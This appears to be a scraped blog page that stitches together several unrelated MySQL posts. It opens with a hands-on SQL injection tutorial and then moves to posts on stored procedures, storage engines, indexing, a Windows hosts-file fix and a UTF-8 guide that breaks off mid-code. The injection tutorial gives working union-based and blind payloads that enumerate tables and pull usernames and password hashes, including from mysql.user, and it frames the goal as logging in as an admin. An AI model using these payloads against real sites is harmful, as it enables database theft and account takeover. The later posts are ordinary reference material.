Full SQL Injection Tutorial (MySQL)

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?

It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it) πŸ˜€

2.Blind SQL Injection (the harder part)

So let’s start with some action πŸ˜€

1). Check for vulnerability

Let’s say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ‘ (quote),

and that would be http://www.site.com/news.php?id=5’

so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar

that means is vulrnable to sql injection πŸ™‚

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <– no error

http://www.site.com/news.php?id=5 order by 2/* <– no error

http://www.site.com/news.php?id=5 order by 3/* <– no error

http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ‘4’ in ‘order clause’ or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works πŸ™‚

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try —
it’s a comment and it’s important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

i didn’t see any paper covering this problem, so i must write it πŸ™‚

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version πŸ˜€

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)

we know that table admin exists…

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up πŸ™‚

i.e md5 hash, mysql hash, sha1…

now we must complete query to look nice πŸ™‚

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser πŸ˜€

if can’t guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc… πŸ˜€

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc… πŸ˜€

if you wanna display column names for specific table use this query. (where clause)

let’s say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won’t work if the magic quotes is ON.

let’s say that we found colums user, pass and email.

now to complete query to put them all together πŸ˜€

for that we use concat() , i decribe it earlier.

i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com

That’s all in this part, now we can proceed on harder part πŸ™‚

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done πŸ˜€

I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it πŸ˜€

Let’s start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc…

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <— this is always true

and the page loads normally, that’s ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <— this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don’t work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend πŸ™‚

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one πŸ™‚

let’s say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.

then let’s check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,cause that makes you better SQL INJECTOR πŸ˜€

Hope you learned something from this paper.
Have FUN! (:

MySql Store Procedure

Summary: in this tutorial, you will learn about MySQL stored procedures, their advantages and disadvantages.

Definition of stored procedures

A stored procedure is a segment of declarative SQL statements stored inside the database catalog. A stored procedure can be invoked by triggers, other stored procedures or applications such as Java, C#, PHP, etc.

A stored procedure that calls itself is known as a recursive stored procedure. Most database management system supports recursive stored procedures. However MySQL does not support it very well. You should check your version of MySQL database before implementing recursive stored procedures in MySQL.

Stored Procedures in MySQL

MySQL is known as the most popular open source RDBMS which is widely used by both community and enterprise. However, during the first decade of its existence, it did not support stored procedures, stored functions, triggers and events. Since MySQL version 5.0, those features were added to MySQL database engine to make it more flexible and powerful.

MySQL stored procedures advantages

  • Typically stored procedures help increase the performance of the applications. Once created, stored procedures are compiled and stored in the database. However MySQL implements the stored procedures slightly different. MySQL stored procedures are compiled on demand. After compiling a stored procedure, MySQL puts it to a cache. And MySQL maintains its own stored procedure cache for every single connection. If an application uses a stored procedure multiple times in a single connection, the compiled version is used, otherwise the stored procedure works like a query.
  • Stored procedures helps reduce the traffic between application and database server because instead of sending multiple lengthy SQL statements, the application has to send only name and parameters of the stored procedure.
  • Stored procedures are reusable and transparent to any applications. Stored procedures expose the database interface to all applications so that developers don’t have to develop functions that are already supported in stored procedures.
  • Stored procedures are secure. Database administrator can grant appropriate permissions to applications that access stored procedures in the database without giving any permission on the underlying database tables.

Besides those advantages, stored procedures have their own disadvantages, which you should be aware of before using the store procedures.

MySQL stored procedures disadvantages

  • If you use a lot of stored procedures, the memory usage of every connection that is using those stored procedures will increase substantially. In addition, if you overuse a large number of logical operations inside store procedures, the CPU usage will also increase because database server is not well-designed for logical operations.
  • A constructs of stored procedures make it more difficult to develop stored procedures that have complicated business logic.
  • It is difficult to debug stored procedures. Only few database management systems allow you to debug stored procedures. Unfortunately, MySQL does not provide facilities for debugging stored procedures.
  • It is not easy to develop and maintain stored procedures. Developing and maintaining stored procedures are often required specialized skill set that not all application developers possess. This may lead to problems in both application development and maintenance phases.

MySQL stored procedures have their own advantages and disadvantages. When you develop applications, you should decide whether you should or should not use stored procedure based on the business requirements.

In the following tutorials, we will show you how to leverage MySQL stored procedures in your database programming tasks with many practical examples.

Main difference between InnoDB and MyISAM

The main differences between InnoDB and MyISAM (“with respect to designing a table or database” you asked about) are support for “referential integrity” and “transactions”.

If you need the database to enforce foreign key constraints, or you need the database to support transactions (i.e. changes made by two or more DML operations handled as single unit of work, with all of the changes either applied, or all the changes reverted) then you would choose the InnoDB engine, since these features are absent from the MyISAM engine.

Those are the two biggest differences. Another big difference is concurrency. With MyISAM, a DML statement will obtain an exclusive lock on the table, and while that lock is held, no other session can perform a SELECT or a DML operation on the table.

Those two specific engines you asked about (InnoDB and MyISAM) have different design goals. MySQL also has other storage engines, with their own design goals.

So, in choosing between InnoDB and MyISAM, the first step is in determining if you need the features provided by InnoDB. If not, then MyISAM is up for consideration.

A more detailed discussion of differences is rather impractical absent a more detailed discussion of the problem space… how the application will use the database, how many tables, size of the tables, the transaction load, volumes of select, insert, updates, concurrency requirements, replication features, etc.

MySQL Query Optimization | Using Indexing

Database management systems implement abstract concepts but do so on real hardware bound by real physical constraints. As a result, queries take time—sometimes an annoyingly long time. Find out how to minimize your wait in this sample chapter.

The world of relational database theory is a world dominated by tables
and sets, and operations on tables and sets. A database is a set of tables,
and a table is a set of rows and columns. When you issue a SELECT statement
to retrieve rows from a table, you get back another set of rows and columns—that
is, another table. These are abstract notions that make no reference to the
underlying representation a database system uses to operate on the data in
your tables. Another abstraction is that operations on tables happen all at
once; queries are conceptualized as set operations and there is no concept
of time in set theory.

The real world, of course, is quite different. Database management systems
implement abstract concepts but do so on real hardware bound by real physical
constraints. As a result, queries take time—sometimes an annoyingly long
time. And we, being impatient creatures, don’t like to wait, so we leave
the abstract world of instantaneous mathematical operations on sets and look
around for ways to speed up our queries. Fortunately, there are several techniques
for doing so:

  • We index tables to allow the database server to look up rows more quickly.

  • We consider how to write queries to take advantage of those indexes to
    the fullest extent, and use the EXPLAIN statement to check whether
    the MySQL server really is doing so.

  • We write queries to affect the server’s scheduling mechanism so that
    queries arriving from multiple clients cooperate better.

  • We modify the server’s operating parameters to get it to perform
    more efficiently. We think about what’s going on with the underlying
    hardware and how we can work around its physical constraints to improve
    performance.

Those are the kinds of issues that this chapter focuses on, with the goal
of assisting you in optimizing the performance of your database system so that
it processes your queries as quickly as possible. MySQL is already quite fast,
but even the fastest database can run queries more quickly if you help it do
so.

Using Indexing

Indexing is the most important tool you have for speeding up queries. Other
techniques are available to you, too, but generally the one thing that makes the
most difference is the proper use of indexes. On the MySQL mailing list, people
often ask for help in making a query run faster. In a surprisingly large number
of cases, there are no indexes on the tables in question, and adding indexes
often solves the problem immediately. It doesn’t always work like that,
because optimization isn’t always simple. Nevertheless, if you don’t
use indexes, in many cases you’re just wasting your time trying to improve
performance by other means. Use indexing first to get the biggest performance
boost and then see what other techniques might be helpful.

This section describes what an index is and how indexing improves query
performance. It also discusses the circumstances under which indexes might
degrade performance and provides guidelines for choosing indexes for your table
wisely. In the next section, we’ll discuss MySQL’s query optimizer
that attempts to find the most efficient way to execute queries. It’s good
to have some understanding of the optimizer in addition to knowing how to create
indexes because then you’ll be better able to take advantage of the indexes
you create. Certain ways of writing queries actually prevent your indexes from
being useful, and generally you’ll want to avoid having that happen.

Benefits of Indexing

Let’s consider how an index works by beginning with a table that has no
indexes. An unindexed table is simply an unordered collection of rows. For
example, Figure 4.1 shows the ad table that was discussed in Chapter 1,
“Getting Started with MySQL and SQL.” There are no indexes on this
table, so to find the rows for a particular company, it’s necessary to
examine each row in the table to see if it matches the desired value. This
involves a full table scan, which is slow, as well as tremendously inefficient
if the table is large but contains only a few records that match the search
criteria.

Figure 4.2 shows the same table, but with the addition of an index on the
company_num column in the ad table. The index contains an
entry for each row in the ad table, but the index entries are sorted by
company_num value. Now, instead of searching through the table row by
row looking for items that match, we can use the index. Suppose that we’re
looking for all rows for company 13. We begin scanning the index and find three
values for that company. Then we reach the index value for company 14, which is
higher than the one we’re looking for. Index values are sorted, so when we
read the index record containing 14, we know we won’t find any more matches
and can quit looking. Thus, one efficiency gained by using the index is that we
can tell where the matching rows end and can skip the rest. Another efficiency
comes about through the use of positioning algorithms for finding the first
matching entry without doing a linear scan from the start of the index (for
example, a binary search is much quicker than a scan). That way, we can quickly
position to the first matching value and save a lot of time in the search.
Databases use various techniques for positioning to index values quickly, but
it’s not so important here what those techniques are. What’s important
is that they work and that indexing is a good thing.


Figure 4.1

Figure 4.1 Unindexed
ad table.


Figure 4.2

Figure 4.2 Indexed
ad table.

You might be asking why we don’t just sort the data rows and dispense
with the index. Wouldn’t that produce the same type of improvement in
search speed? Yes, it would—if the table had a single index. But you might
want to add a second index, and you can’t sort the data rows two different
ways at once. (For example, you might want one index on customer names and
another on customer ID numbers or phone numbers.) Using indexes as entities
separate from the data rows solves the problem and allows multiple indexes to be
created. In addition, rows in the index are generally shorter than data rows.
When you insert or delete new values, it’s easier to move around shorter
index values to maintain the sort order than to move around the longer data
rows.

The particular details of index implementations vary for different MySQL
storage engines. For example, for a MyISAM table, the table’s data rows are
kept in a data file, and index values are kept in an index file. You can have
more than one index on a table, but they’re all stored in the same index
file. Each index in the index file consists of a sorted array of key records
that are used for fast access into the data file.

By contrast, the BDB and InnoDB storage engines do not separate data rows and
index values in the same way, although both maintain indexes as sets of sorted
values. By default, the BDB engine uses a single file per table to store both
data and index values. The InnoDB engine uses a single tablespace within which
it manages data and index storage for all InnoDB tables. InnoDB can be
configured to create each table with its own tablespace, but even so, a
table’s data and indexes are stored in the same tablespace file.

The preceding discussion describes the benefit of an index in the context of
single-table queries, where the use of an index speeds searches significantly by
eliminating the need for full table scans. Indexes are even more valuable when
you’re running queries involving joins on multiple tables. In a
single-table query, the number of values you need to examine per column is the
number of rows in the table. In a multiple-table query, the number of possible
combinations skyrockets because it’s the product of the number of rows in
the tables.

Suppose that you have three unindexed tables, t1, t2, and
t3, each containing a column i1, i2, and i3,
respectively, and each consisting of 1,000 rows that contain the numbers 1
through 1000. A query to find all combinations of table rows in which the values
are equal looks like this:

SELECT t1.i1, t2.i2, t3.i3
FROM t1, t2, t3
WHERE t1.i1 = t2.i2 AND t2.i1 = t3.i3;

The result of this query should be 1,000 rows, each containing three equal
values. If we process the query in the absence of indexes, we have no idea which
rows contain which values without scanning them all. Consequently, we must try
all combinations to find the ones that match the WHERE clause. The
number of possible combinations is 1,000 x 1,000 x 1,000 (one billion!), which
is a million times more than the number of matches. That’s a lot of wasted
effort. The example illustrates that as tables grow, the time to process joins
on those tables grows even more if no indexes are used, leading to very poor
performance. We can speed things up considerably by indexing the tables, because
the indexes allow the query to be processed like this:

  1. Select the first row from table t1 and see what value the row
    contains.

  2. Using the index on table t2, go directly to the row that matches
    the value from t1. Similarly, using the index on table t3, go
    directly to the row that matches the value from t2.

  3. Proceed to the next row of table t1 and repeat the preceding
    procedure. Do this until all rows in t1 have been examined.

In this case, we still perform a full scan of table t1, but we can
do indexed lookups on t2 and t3 to pull out rows from those
tables directly. The query runs about a million times faster this
way—literally. This example is contrived for the purpose of making a point,
of course. Nevertheless, the problems it illustrates are real, and adding
indexes to tables that have none often results in dramatic performance
gains.

MySQL uses indexes in several ways:

  • As just described, indexes are used to speed up searches for rows
    matching terms of a WHERE clause or rows that match rows in other
    tables when performing joins.

  • For queries that use the MIN() or MAX() functions, the
    smallest or largest value in an indexed column can be found quickly without
    examining every row.

  • MySQL can often use indexes to perform sorting and grouping operations
    quickly for ORDER BY and GROUP BY
    clauses.

  • Sometimes MySQL can use an index to reading all the information required
    for a query. Suppose that you’re selecting values from an indexed numeric
    column in a MyISAM table, and you’re not selecting other columns from the
    table. In this case, when MySQL reads an index value from the index file, it
    obtains the same value that it would get by reading the data file. There’s
    no reason to read values twice, so the data file need not even be
    consulted.

Costs of Indexing

In general, if MySQL can figure out how to use an index to process a query
more quickly, it will. This means that, for the most part, if you don’t
index your tables, you’re hurting yourself. You can see that I’m
painting a rosy picture of the benefits of indexing. Are there disadvantages?
Yes, there are. There are costs both in time and in space. In practice, these
drawbacks tend to be outweighed by the advantages, but you should know what they
are.

First, indexes speed up retrievals but slow down inserts and deletes, as well
as updates of values in indexed columns. That is, indexes slow down most
operations that involve writing. This occurs because writing a record requires
writing not only the data row, it requires changes to any indexes as well. The
more indexes a table has, the more changes need to be made, and the greater the
average performance degradation. In the section “Loading Data
Efficiently,” we’ll go into more detail about this phenomenon and what
you can do about it.

Second, an index takes up disk space, and multiple indexes take up
correspondingly more space. This might cause you to reach a table size limit
more quickly than if there are no indexes:

  • For a MyISAM table, indexing it heavily may cause the index file to reach
    its maximum size more quickly than the data file.

  • For BDB tables, which store data and index values together in the same
    file, adding indexes causes the table to reach the maximum file size more
    quickly.

  • All InnoDB tables that are located within the InnoDB shared tablespace
    compete for the same common pool of space, and adding indexes depletes storage
    within this tablespace more quickly. However, unlike the files used for MyISAM
    and BDB tables, the InnoDB shared tablespace is not bound by your operating
    system’s file-size limit, because it can be configured to use multiple
    files. As long as you have additional disk space, you can expand the tablespace
    by adding new components to it.

  • InnoDB tables that use individual tablespaces are constrained the same
    way as BDB tables because data and index values are stored together in a single
    file.

The practical implication of both these factors is that if you don’t
need a particular index to help queries perform better, don’t create
it.

Choosing Indexes

The syntax for creating indexes is covered in the section “Creating
Indexes,” of Chapter 2, “MySQL SQL Syntax and Use.” I assume here
that you’ve read that section. But knowing syntax doesn’t in itself
help you determine how your tables should be indexed. That requires
some thought about the way you use your tables. This section gives some
guidelines on how to identify candidate columns for indexing and how best to set
up indexes:

Index columns that you use for searching, sorting, or grouping, not columns
you only display as output.
In other words, the best candidate columns
for indexing are the columns that appear in your WHERE clause, columns
named in join clauses, or columns that appear in ORDER BY or GROUP BY clauses.
Columns that appear only in the output column list following the SELECT keyword
are not good candidates:

SELECT
  col_a                      <- not a candidate
FROM
  tbl1 LEFT JOIN tbl2
  ON tbl1.col_b = tbl2.col_c <- candidates
WHERE
  col_d = expr;              <- a candidate

The columns that you display and the columns you use in the WHERE clause
might be the same, of course. The point is that appearance of a column in the
output column list is not in itself a good indicator that it should be indexed.

Columns that appear in join clauses or in expressions of the form
col1 = col2 in WHERE
clauses are especially good candidates for indexing. col_b and
col_c in the query just shown are examples of this. If MySQL can
optimize a query using joined columns, it cuts down the potential table-row
combinations quite a bit by eliminating full table scans.

Consider column cardinality. The cardinality of a column is
the number of distinct values that it contains. For example, a column that
contains the values 1, 3, 7, 4, 7, and 3 has a cardinality of four. Indexes work
best for columns that have a high cardinality relative to the number of rows in
the table (that is, columns that have many unique values and few duplicates). If
a column contains many different age values, an index will differentiate rows
readily. An index will not help for a column that is used to record sex and
contains only the two values 'M' and 'F'.
If the values occur about equally, you’ll get about half of the rows
whichever value you search for. Under these circumstances, the index might never
be used at all, because the query optimizer generally skips an index in favor of
a full table scan if it determines that a value occurs in a large percentage of
a table’s rows. The conventional wisdom for this percentage used to be
“30%.” Nowadays the optimizer is more complex and takes other factors
into account, so the percentage is not the sole determinant of when MySQL
prefers a scan over using an index.

Index short values. Use smaller data types when possible.
For example, don’t use a BIGINT column if a MEDIUMINT is
large enough to hold the values you need to store. Don’t use
CHAR(100) if none of your values are longer than 25 characters. Smaller
values improve index processing in several ways:

  • Shorter values can be compared more quickly, so index lookups are
    faster.

  • Smaller values result in smaller indexes that require less disk
    I/O.

  • With shorter key values, index blocks in the key cache hold more key
    values. MySQL can hold more keys in memory at once, which improves the
    likelihood of locating key values without reading additional index blocks from
    disk.

For the InnoDB and BDB storage engines that use clustered indexes, it’s
especially beneficial to keep the primary key short. A clustered index is one
where the data rows are stored together with (that is, clustered with) the
primary key values. Other indexes are secondary indexes; these store the primary
key value with the secondary index values. A lookup in a secondary index yields
a primary key value, which then is used to locate the data row. The implication
is that primary key values are duplicated into each secondary index, so if
primary key values are longer, the extra storage is required for each secondary
index as well.

Index prefixes of string values. If you’re indexing a
string column, specify a prefix length whenever it’s reasonable to do so.
For example, if you have a CHAR(200) column, don’t index the
entire column if most values are unique within the first 10 or 20 characters.
Indexing the first 10 or 20 characters will save a lot of space in the index,
and probably will make your queries faster as well. By indexing shorter values,
you gain the advantages described in the previous item relating to comparison
speed and disk I/O reduction. You want to use some common sense, of course.
Indexing just the first character from a column isn’t likely to be that
helpful because then there won’t be very many distinct values in the
index.

You can index prefixes of CHAR, VARCHAR, BINARY,
VARBINARY, BLOB, and TEXT columns. The syntax is
described in “Creating Indexes,” in Chapter 2.

Take advantage of leftmost prefixes. When you create an
n-column composite index, you actually create
n indexes that MySQL can use. A composite index serves as
several indexes because any leftmost set of columns in the index can be used to
match rows. Such a set is called a “leftmost prefix.” (This is
different from indexing a prefix of a column, which is using the first
n characters of the column for index values.)

Suppose that you have a table with a composite index on columns named
state, city, and zip. Rows in the index are sorted in
state/city/zip order, so they’re automatically sorted in
state/city order and in state order as well. This means that
MySQL can take advantage of the index even if you specify only state
values in a query, or only state and city values. Thus, the
index can be used to search the following combinations of columns:

state, city, zip
state, city
state

MySQL cannot use the index for searches that don’t involve a leftmost
prefix. For example, if you search by city or by zip, the
index isn’t used. If you’re searching for a given state and a
particular ZIP code (columns 1 and 3 of the index), the index can’t be used
for the combination of values, although MySQL can narrow the search using the
index to find rows that match the state.

Don’t over-index. Don’t index everything in sight
based on the assumption “the more, the better.” That’s a mistake.
Every additional index takes extra disk space and hurts performance of write
operations, as has already been mentioned. Indexes must be updated and possibly
reorganized when you modify the contents of your tables, and the more indexes
you have, the longer this takes. If you have an index that is rarely or never
used, you’ll slow down table modifications unnecessarily. In addition,
MySQL considers indexes when generating an execution plan for retrievals.
Creating extra indexes creates more work for the query optimizer. It’s also
possible (if unlikely) that MySQL will fail to choose the best index to use when
you have too many indexes. Maintaining only the indexes you need helps the query
optimizer avoid making such mistakes.

If you’re thinking about adding an index to a table that is already
indexed, consider whether the index you’re thinking about adding is a
leftmost prefix of an existing multiple-column index. If so, don’t bother
adding the index because, in effect, you already have it. (For example, if you
already have an index on state, city, and zip, there
is no point in adding an index on state.)

Match index types to the type of comparisons you perform.
When you create an index, most storage engines choose the index implementation
they Match index types to the type of comparisons you perform. When you
create an index, most storage engines choose the index implementation they will
use. For example, InnoDB always uses B-tree indexes. MySQL also uses B-tree indexes,
except that it uses R-tree indexes for spatial data types. However, the MEMORY
storage engine supports hash indexes and B-tree indexes, and allows you to select
which one you want. To choose an index type, consider what kind of comparison
operations you plan to perform on the indexed column:

  • For a hash index, a hash function is applied to each column value. The
    resulting hash values are stored in the index and used to perform lookups.
    (A hash function implements an algorithm that is likely to produce distinct
    hash values for distinct input values. The advantage of using hash values
    is that they can be compared more efficiently than the original values.)
    Hash indexes are very fast for exact-match comparisons performed with the = or <=> operators.
    But they are poor for comparisons that look for a range of values, as in
    these expressions:

  • id < 30
    weight BETWEEN 100 AND 150
  • B-tree indexes can be used effectively for comparisons involving exact
    or range-based comparisons that use the <, <=, =, >=, >, <>, !=,
    and BETWEEN operators. B-tree indexes can also be used for LIKE pattern
    matches if the pattern begins with a literal string rather than a wildcard
    character.

If you use a MEMORY table only for exact-value lookups, a hash index is a
good choice. This is the default index type for MEMORY tables, so you need
do nothing special. If you need to perform range-based comparisons with a MEMORY
table, you should use a B-tree index instead. To specify this type of index,
add USING BTREE to your index definition. For example:

CREATE TABLE lookup
(
  id   INT NOT NULL,
  name  CHAR(20),
  PRIMARY KEY USING BTREE (id)
) ENGINE = MEMORY;

If the types of statements that you expect to execute warrant it, a single
MEMORY table can have both hash indexes and B-tree indexes, even on the same
column.

Some types of comparisons cannot use indexes. If you perform comparisons only
by passing column values to a function such as STRCMP(), there is no
value in indexing it. The server must evaluate the function value for each row,
which precludes use of an index on the column.

Use the slow-query log to identify queries that may be performing
badly.
This log can help you find queries that might benefit from
indexing. You can view this log directly (it is written as a text file), or use
the mysqldumpslow utility to summarize its contents. (See Chapter 11,
“General MySQL Administration,” for a discussion of MySQL’s log
files.) If a given query shows up over and over in the slow-query log,
that’s a clue you’ve found a query that might not be written
optimally. You may be able to rewrite it to make it run more quickly. Keep in
mind when assessing your slow-query log that “slow” is measured in
real time, so more queries will show up in the slow-query log on a heavily
loaded server than on a lightly loaded one.

Fix “A connection attempt failed because the connected party did not” PHP error

I recently upgraded my PHP version to 5.3 and afterwards could not connect to MySQL. I was getting the following error in my PHP error log: PHP Warning: mysql_connect(): [2002] A connection attempt failed because the connected party did not (trying to connect via tcp://localhost:3306)

The solution is to do with Windows enabling IPv6 support while MySQL does not support this yet. ‘localhost’ is being converted to ::1 instead of 127.0.0.1, the solution to this is simple.

Go the the following directory: C:\Windows\System32\drivers\etc

Allow yourself full access to the hosts file by right clicking it and clicking properties.

Next go to the security tab and click the big “Edit” button.

Click on the “Users” group. Below this check the “Full Control” box and then save the changes.

Now that you have access to the file, open the hosts file with a text editor such as notepad.

Comment out the ::1 line with a # so the file will look something like:

# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
#::1             localhost

Once you are done, save the file and try to access your PHP page again that is using MySQL. It should work immedietley.

Working with Multi Languages using MySQL and PHP.

Hey Guys,

I am a Freelance Web Developer and my main tools are PHP & MySQL. Few days ago, I got a Chinese project where I had to develop a Real Estate site in Chinese language. You know we often build websites in English and Databases are in English too. So, the default configuration in MySQL works fine everytime.

But when it comes a language other than English, many people do not know what to do. Well. When I started the project, I did not even know that the default MySQL settings will not work for the Chinese language. So, I started searching for a stable solution where my program will support any language for adding, updating and searching data from the MySQL database.

And Yeah.
I found it!

OK.

Let us see the solution now.
It is very very simple.

Step One: SET THE CHARSET TO UTF-8 IN THE HEAD SECTION

First of all, the browser needs to know that you are going to display or use Unicode in this page. So, go to your <HEAD></HEAD> section and set the charset to utf-8. So, the browser will be able to show the Unicode text without any error and smoothly. You can also copy and paste the line below:

{code type=HTML}

{/code}

Step Two: CREATING THE DATABASE

When you create your (a) Database and (b) any Table in the database, set theΒ CollationΒ of both of them toΒ utf8_unicode_ciΒ and you know it is very easy if you are using phpMyAdmin.

Step Three: DATABASE INITIALIZATION

When you initialize the database connection, please add the β€œextra lines”

{code type=PHP}

define(‘HOSTNAME’, ‘localhost’);
define(‘USERNAME’, ‘database_user_name’);
define(‘PASSWORD’, ‘database_password’);
define(‘DATABASE’, ‘database_name’);

